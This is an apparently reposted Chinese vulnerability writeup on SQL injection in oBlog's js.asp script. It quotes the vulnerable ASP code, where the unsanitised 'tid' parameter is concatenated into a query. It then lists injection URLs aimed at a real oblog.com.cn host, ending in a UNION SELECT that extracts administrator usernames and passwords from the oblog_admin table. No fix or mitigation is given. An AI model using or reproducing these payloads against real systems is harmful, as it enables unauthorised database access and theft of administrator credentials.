-
客服电话
-
APP下载
迪恩网络APP
随时随地掌握行业动态
-
官方微信
扫描二维码
关注迪恩网络微信公众号
客服电话
APP下载
迪恩网络APP
随时随地掌握行业动态
官方微信
扫描二维码
关注迪恩网络微信公众号
|
来源:Deepen Study 漏洞文件:js.asp <% Dim oblog set oblog=new class_sys oblog.autoupdate=False oblog.start dim js_blogurl,n js_blogurl=Trim(oblog.CacheConfig(3)) n=CInt(Request(”n”)) if n=0 then n=1 select case CInt(Request(”j”)) case 1 call tongji() case 2 call topuser() case 3 call adduser() case 4 call listclass() case 5 call showusertype() case 6 call listbestblog() case 7 call showlogin() case 8 call showplace() case 9 call showphoto() case 10 call showblogstars() Case 11 Call show_hotblog() Case 12 Call show_teams() Case 13 Call show_posts() Case 14 Call show_hottag() case 0 call showlog() end select ****************省略部分代码****************** Sub show_posts() Dim teamid,postnum,l,u,t teamid=Request(”tid”) postnum=n l=CInt(Request(”l”)) u=CInt(Request(”u”)) t=CInt(Request(”t”)) Dim rs,sql,sRet,sAddon Sql=”select Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ” If teamid<>“” And teamid<>“0″ Then teamid=Replace(teamid,”|”,”,”) Sql=Sql & ” And teamid In (” & teamid & “) ” End If Sql=Sql & ” order by postid Desc” Set rs=oblog.Execute(Sql) sRet=” ” Do While Not rs.Eof sAddon=”" * sRet=sRet & “ ” & oblog.Filt_html(Left(rs(2),l)) & “” If u=1 Then sAddon=rs(4) if t=1 Then If sAddon<>“” Then sAddon=sAddon & “,” sAddon=sAddon & rs(3) End If If sAddon<>“” Then sAddon=”(” & sAddon & “)” sRet=sRet & sAddon & “ ” rs.Movenext Loop Set rs = Nothing sRet=sRet & “ ” Response.write oblog.htm2js (sRet,True) End Sub 调用show_posts()过程必须要符合上面的参数n=1,j=13 (” & teamid & “) http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1 http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=1 返回正常 http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=2 返回异常 猜管理员表名 http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 查询语句 and (1=1 Sql=”select Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ” http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select 1,2,3,4,5,6 from oblog_admin where id=(1 document.write(' * ‘); gid=1跟pid=2里的1,2就是了 直接替换里面的1,2为username,password http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select username,password,3,4,5,6 from oblog_admin where id=(1 |
请发表评论